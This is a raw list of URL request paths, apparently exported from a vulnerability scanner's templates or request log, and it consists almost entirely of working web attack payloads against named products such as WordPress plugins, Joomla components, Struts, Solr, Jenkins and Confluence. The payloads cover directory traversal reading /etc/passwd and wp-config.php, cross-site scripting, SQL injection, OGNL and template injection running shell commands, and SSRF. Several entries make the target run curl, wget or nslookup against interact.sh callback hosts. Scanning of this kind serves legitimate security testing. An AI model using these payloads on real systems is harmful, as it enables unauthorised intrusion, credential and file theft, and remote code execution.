"/maint/modules/home/index.php?lang=english%7Ccat%20/etc/passwd",
"/wp-login.php",
"/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php",
"/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x'%2Balert(1)%2B'x",
"/wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(%22id%22)')%7D",
"/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://cadgqm02toabu64p21o0ckoy7teyjce6y.interact.sh",
"/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E",
"/%7B%7Bslug%7D%7D/?a"><script>alert(document.domain)</script>",
"/api/timelion/run",
"/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00",
"/upload",
"/data/autosuggest-remote.php?q=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E",
"/control/stream?contentId='%5C%22%3E%3Csvg/onload=alert(xss)%3E",
"/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00",
"/redfish/v1/SessionService/ResetPassword/1/",
"/sample-apps/hello/%2F/",
"/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/_snapshot/test",
"/goform/setSysAdm",
"/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php",
"/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s",
"/concat?/%2557EB-INF/web.xml",
"/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=",
"/webmail/old/calendar/minimizer/index.php?style=...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2Fetc%2Fpasswd",
"/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php",
"/web.config.i18n.ashx?l=nuclei&v=nuclei",
"/maint/modules/home/index.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00english",
"/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/pandora_console/ajax.php?page=../../../../../../etc/passwd",
"/pentaho/api/userrolelist/systemRoles?require-cfg.js",
"/dfsms/",
"/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00",
"/Images/Remote?imageUrl=http://cadgqm02toabu64p21o0ckof1eaym8yqh.interact.sh",
"/cgi-bin/awstats/awredir.pl?url=example.com",
"/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log",
"/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=",
"/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/download/C%3A%2Fwindows%2Fsystem.ini",
"/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=../../../wp-config.php",
"/infusions/downloads/downloads.php?cat_id=$%7Bsystem(ls)%7D",
"/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2A6ShpF9WQ3s2XlWG1zeTZydxj0.svg",
"/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains",
"/secure/ViewUserHover.jspa",
"/api/content/",
"/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com');alert(/2A6ShpKRDoAFXOqCqSec1USMLKq/);marmoset.embed('a",
"/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/assets/app/%7B%7Bid%7D%7D/services/AppModule.class/",
"/log/view?filename=/windows/win.ini&base=../../../../../../../../../../",
"/axis2/axis2-admin/login",
"/fcgi-bin/wgsetcgi",
"/secure/QueryComponent!Default.jspa",
"/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg",
"/_snapshot/test/backdata%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3E'%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/sitecore/shell/ClientBin/Reporting/Report.ashx",
"/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility",
"/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url'%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/webapp/?fccc'%5C%22%3E%3Csvg/onload=alert(xss)%3E",
"/api/userrolelist/systemRoles?require-cfg.js",
"/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00",
"/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0D%0A)%3B//%22%22%3E%3Cdiv%3Ex%0D%0A%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E",
"/session/create",
"/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00",
"/service/v1/service-details",
"/wp-content/plugins/easy-wp-smtp/",
"/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00",
"/getFavicon?host=http://cadgqm02toabu64p21o0cko5x6yyq5zro.interact.sh",
"/index.php?option=com_jejob&view=../../../../../../etc/passwd%00",
"/struts2-rest-showcase/orders/3",
"/wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=%22onmouseover=alert(document.domain)/",
"/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini",
"/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/carbon/generic/save_artifact_ajaxprocessor.jsp",
"/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00",
"/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E",
"/solr/%7B%7Bcore%7D%7D/dataimport?indent=on&wt=json",
"/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld",
"/client/index.php",
"/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/elfinder/elfinder-cke.html",
"/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1",
"/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00",
"/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/passwordrecovered.cgi?id=nuclei",
"/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd",
"/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en",
"/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?Express=aaaa&autoEscape=&defaultFilter=e');var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require('child_process').exec('wget%20http://cadgqm02toabu64p21o0cko8ndyymxjg6.interact.sh');//",
"/wlsecurity.html",
"/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name='test',%20root='http://aaa')%0A@Grab(group='package',%20module='vulntest',%20version='1')%0Aimport%20Payload;",
"/invoker/EJBInvokerServlet/",
"/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
"/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini",
"/?class.module.classLoader.resources.context.configFile=https://cadgqm02toabu64p21o0ckteznaytazsc.interact.sh&class.module.classLoader.resources.context.configFile.content.aaa=xxx",
"/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample",
"/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;",
"/index.php?appservlang=%3Csvg%2Fonload=confirm('xss')%3E",
"/wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(document.domain)+x%3D",
"/v1/backend1",
"/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls%5B%5D=%3Cimg%20src=x%20onerror=alert(document.domain)%3E",
"/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=(SELECT%20CONCAT(CONCAT(CHAR(126)%2C(SELECT%20SUBSTRING((ISNULL(CAST(db_name()%20AS%20NVARCHAR(4000))%2CCHAR(32)))%2C1%2C1024)))%2CCHAR(126)))",
"/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd",
"/api/user/%7B%7Bid%7D%7D",
"/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00",
"/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg",
"/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/includes/mysql2i/mysql2i.func.php",
"/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd",
"/plugin",
"/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password",
"/cgi-bin/mainfunction.cgi",
"/?url=http://example.com",
"/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd",
"/webEdition/showTempFile.php?file=../../../../etc/passwd",
"/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini",
"/Assets/temp/hotspot/img/logohotspot.txt",
"/wp-content/uploads/wp-security-audit-log/failed-logins/",
"/index.action?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3D%23res.getWriter(),%23s%3Dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3D%23s.hasNext()%3F%23s.next()%3A%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd",
"/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%3Cp%20class=%22&p=1",
"/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd",
"/rapi/filedownload?filter=path:%2Fetc%2Fpasswd",
"/ebook/bookPerPub.php?pubid=4'",
"/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E",
"/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin",
"/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd",
"/index.php/%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E?page=HOME",
"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc",
"/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00",
"/dati/availability_tpl.php?num_app_tipo_richiesti1=%22%3E%3Cscript%3Ejavascript:alert('XSS')%3C/script%3E",
"/tools.cgi",
"/seo/seopanel/login.php?sec=forgot",
"/tests/generate.php",
"/names.nsf/People?OpenView",
"/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/uploads/elfinder/elfinder-cke.html",
"/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&",
"/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd",
"/agc/vicidial_mysqli_errors.txt",
"/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00",
"/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert(123)%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13",
"/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22nslookup%20cadgqm02toabu64p21o0cko9mxyyoysso.interact.sh%22)%7D__::.x/",
"/www/delivery/lg.php?dest=http://example.com",
"/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php",
"/api/v1/method.callAnon/sendForgotPasswordEmail",
"/fhem/FileLog_logWrapper?dev=Logfile&file=%2Fetc%2Fpasswd&type=text",
"/index.action?redirect:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert(document.domain)%3B%3C%2Fscript%3E%3C%22",
"/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00",
"/redfish/v1/SessionService/Sessions/",
"/catalog.php?filename=../../../../../../../../../etc/passwd",
"/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00",
"/wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action",
"/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd",
"/fw.login.php?apikey='UNION%20select%201,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';",
"/?qtproxycall=http://cadgqm02toabu64p21o0ckoo7xyypeqfn.interact.sh",
"/login.action?redirect:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00",
"/CMSPages/GetDocLink.ashx?link=https://example.com/",
"/index.asp",
"/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00",
"/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert('2A6Shy3VAExp0JdQzyjyUYT011v')%3C/script%3E",
"/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8",
"/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/menu/neo",
"/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00",
"/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1",
"/log/view?filename=/etc/passwd&base=../../../../../../../../../../",
"/public/login.htm?type=requests",
"/iwc/idcStateError.iwc?page=javascript%3Aalert(document.domain)%2F%2F",
"/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd",
"/ajax/networking/get_netcfg.php?iface=;curl%20http://cadgqm02toabu64p21o0ckqwxueyfg3pg.interact.sh/%60whoami%60;",
"/api/external/7.0/system.System.get_infos",
"/test.cgi",
"/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D",
"/admin.back%3Cimg%20src=x%20onerror=alert(document.domain)%3E",
"/XMLCHART",
"/wp-json/wp/v2/posts",
"/orders/3",
"/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/module/ph_simpleblog/list?sb_category=')%20AND%20false--%20-",
"/api/experimental/test",
"/pages/templates2/viewpagetemplate.action",
"/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://cadgqm02toabu64p21o0ckq1a4yyrtyes.interact.sh",
"/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php",
"/index.php/System/MailConnect/host/cadgqm02toabu64p21o0ckozn1oypi6rn.interact.sh/port/80/secure/",
"/analytics/saw.dll?bieehome&startPage=1",
"/wp-content/uploads/workreap-temp/2A6Shrur7UpNyKdlV9y9MQS10Bs.php",
"/gsearch.php.en?prod=';prompt%60document.domain%60;//",
"/pandora_console/attachment/pandora_chat.log.json.txt",
"/~user/%0D%0ASet-Cookie:crlfinjection",
"/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
"/index.php?p=banlist&advSearch=0'%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&advType=btype",
"/admin/post-avehical.php",
"/base_import/static/c:/windows/win.ini",
"/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23",
"/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd",
"/wan.htm",
"/code?dag_id=example_passing_params_via_test_command",
"/include/makecvs.php?Event=%60wget%20http%3A%2F%2Fcadgqm02toabu64p21o0ckoky7oym988h.interact.sh%60",
"/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd",
"/jkstatus",
"/osm_tiles/REGISTER.cmd",
"/plugins/servlet/gadgets/makeRequest",
"/wp-content/plugins/canto/includes/lib/detail.php?subdomain=cadgqm02toabu64p21o0ckp95daybtw7k.interact.sh",
"/run",
"/include/nuclei.txt",
"/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1",
"/wiki/pages/createpage-entervariables.action",
"/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml(0x23,concat(1,md5(8888)),1)",
"/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd",
"/resource/file%3A///etc/passwd/",
"/api/v1/repos/search?q=')%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09('%25'='",
"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession",
"/solr/%7B%7Bcore%7D%7D/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x='')+%23set($rt=$x.class.forName('java.lang.Runtime'))+%23set($chr=$x.class.forName('java.lang.Character'))+%23set($str=$x.class.forName('java.lang.String'))+%23set($ex=$rt.getRuntime().exec('curl%20http://cadgqm02toabu64p21o0ckohcteyxj4zh.interact.sh'))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+%5B1..$out.available()%5D)$str.valueOf($chr.toChars($out.read()))%23end",
"/wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22",
"/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/password_change.cgi",
"/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd",
"/webadmin/script?command=%7C%20nslookup%20cadgqm02toabu64p21o0ckqbr1ayb3n5g.interact.sh",
"/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00",
"/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/auth/newpassword",
"/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd",
"/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv",
"/config/getuser?index=0",
"/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/2A6ShuHFkhFnaDUdXLLWQob91Fd/)%3B%3C%2Fscript%3E%3C",
"/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..%5C..%5C..%5Cwindows%5Cwin.ini",
"/lumis/portal/controller/xml/PageControllerXml.jsp",
"/proxy.stream?origin=http://cadgqm02toabu64p21o0ckpt35yyyqtiw.interact.sh",
"/...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini",
"/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%3Cb",
"/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+",
"/fw/mindex.do?url=./WEB-INF/web.xml%3F",
"/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/invoker/JMXInvokerServlet/",
"/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini",
"/services/user/values.xml?var=STATUS",
"/wp-json/acf/v3/options/a?id=active&field=plugins",
"/apisix/admin/routes",
"/zabbix/setup.php",
"/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..",
"/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==",
"/wp-admin/options-general.php?page=smartcode",
"/wp-content/bps-backup/logs/db_backup_log.txt",
"/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00",
"/AvalancheWeb/image?imageFilePath=C:/windows/win.ini",
"/api/config",
"/oauth/authorize?response_type=$%7B13337*73331%7D&client_id=acme&scope=openid&redirect_uri=http://test",
"/nuclei.txt",
"/services/pluginscript/..;/..;/",
"/setup/index.php?page=servers&mode=test&id=%22%3E'%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release",
"/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00",
"/wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd",
"/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00",
"/?post_type=post&s=%22%3E%3Cscript%3Ealert(/2A6ShtAd9jFU21ebK0XYlLyyfEC/)%3C/script%3E",
"/ui/vropspluginui/rest/services/getvcdetails",
"/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00",
"/searchblox/servlet/FileServlet?col=9&url=/etc/passwd",
"/jkstatus;",
"/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/login?next=%5C%5C%5Cexample.com",
"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd",
"/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cadgqm02toabu64p21o0ckx3unyyeabmy.interact.sh')",
"/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd",
"/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///",
"/webtools/control/SOAPService",
"/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2A6Shn5xRkpSk4MxVJi8L2jgkZj.txt",
"/__raw/services/server/info/server-info?output_mode=json",
"/api/get_device_details",
"/action/usermanager.htm",
"/webGui/images/green-on.png/?path=x&site%5Bx%5D%5Btext%5D=%3C?php%20phpinfo();%20?%3E",
